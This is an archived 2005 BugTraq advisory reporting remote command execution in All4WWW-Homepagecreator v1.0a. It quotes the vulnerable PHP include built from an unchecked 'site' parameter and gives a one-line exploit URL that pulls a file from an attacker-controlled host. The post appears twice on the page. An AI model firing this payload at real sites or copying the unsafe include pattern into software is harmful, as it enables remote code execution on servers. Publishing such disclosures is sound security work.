BugTraq
Back to list
|
Post reply
All4WWW-Homepagecreator Remote Command Execution
Apr 14 2005 03:21AM
Francisco Alisson (dominusvis click21 com br)
################################################
#
# Script: All4WWW-Homepagecreator
# Version: v1.0a
# Vendor: http://www.All4WWW.com
#
################################################
I. Bug Code
On index.php
...
if(!$site) {$site="home";}
include "$site.dat";
...
II. Exploit
[vuln-host]/index.php?site=http://[host]/some-file
PS.: The vendor wasn't inform.
############################################
# by Dominus_Vis
# [Infektion Group]
############################################
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
################################################
#
# Script: All4WWW-Homepagecreator
# Version: v1.0a
# Vendor: http://www.All4WWW.com
#
################################################
I. Bug Code
On index.php
...
if(!$site) {$site="home";}
include "$site.dat";
...
II. Exploit
[vuln-host]/index.php?site=http://[host]/some-file
PS.: The vendor wasn't inform.
############################################
# by Dominus_Vis
# [Infektion Group]
############################################
[ reply ]